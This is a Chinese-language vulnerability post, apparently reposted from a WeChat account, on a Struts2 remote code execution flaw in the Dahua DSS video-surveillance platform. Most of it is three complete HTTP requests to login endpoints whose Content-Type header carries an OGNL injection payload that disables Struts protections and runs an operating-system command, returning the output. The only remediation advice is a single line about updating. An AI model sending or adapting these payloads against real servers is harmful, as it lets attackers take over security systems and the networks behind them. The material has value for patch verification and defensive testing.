大华DSS 安防新平台struts2远程代码执行

2024年6月11日08:45:36评论25 views字数 3350阅读11分10秒阅读模式

漏洞简介

大华DSS安防监控系统平台是一款集视频、报警、存储、管理于一体的综合安防解决方案。该平台支持多种接入方式，包括网络视频、模拟视频、数字视频、IP电话、对讲机等。此外，该平台还支持多种报警方式，包括移动侦测、区域入侵、越线报警、人员聚集等。

大华DSS安防监控系统平台采用Apache Struts2作为网站应用框架。由于应用程序框架存在远程命令执行漏洞，攻击者可以通过在上传文件时修改HTTP请求标头中的Content Type值来触发该漏洞，然后执行该漏洞。系统命令以获取服务器权限。

漏洞复现

POST /portal/login_init.action HTTP/1.1Host: Connection: closeContent-Type: %{(#nike='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='whoami').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}Cache-Control: no-cachePragma: no-cacheUser-Agent: Java/1.8.0_333Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2Content-Length: 0

POST /admin/login_login.action HTTP/1.1Host: Connection: closeContent-Type: %{(#nike='multipart/form-data').(#[email protected]@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='whoami').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}Cache-Control: no-cachePragma: no-cacheUser-Agent: Java/1.8.0_333Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2Content-Length: 0

POST /config/user_toLoginPage.action HTTP/1.1Host: Connection: closeContent-Type: %{(#nike='multipart/form-data').(#[email protected]@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='whoami').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}Cache-Control: no-cachePragma: no-cacheUser-Agent: Java/1.8.0_333Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2Content-Length: 0

修复建议

更新软件，修补漏洞。

原文始发于微信公众号（南街老友）：大华DSS 安防新平台struts2远程代码执行

左青龙
微信扫一扫

右白虎
微信扫一扫

大华DSS 安防新平台struts2远程代码执行

碧海威 L7多款产品存在命令执行漏洞（6000+资产）

CVE-2024-4577PHP-CGI-windows平台远程命令执行漏洞

CVE-2023-24871——RCE

通天星CMSV6车载定位监控平台 point_manage/merge SQL注入致RCE漏洞 PoC

CVE-2024-29973 POC

世邦通信 SPON IP网络对讲广播系统 addmediadata.php 任意文件上传漏洞 poc

CVE-2024-31982 漏洞复现

海康威视综合安防管理平台远程命令执行漏洞（Fastjson）

App托管服务分发平台 index-uplog.php接口处存在任意文件上传漏洞

【PoC】CVE-2024-33113 D-LINK DIR-845L 路由器漏洞

发表评论

在线咨询

微信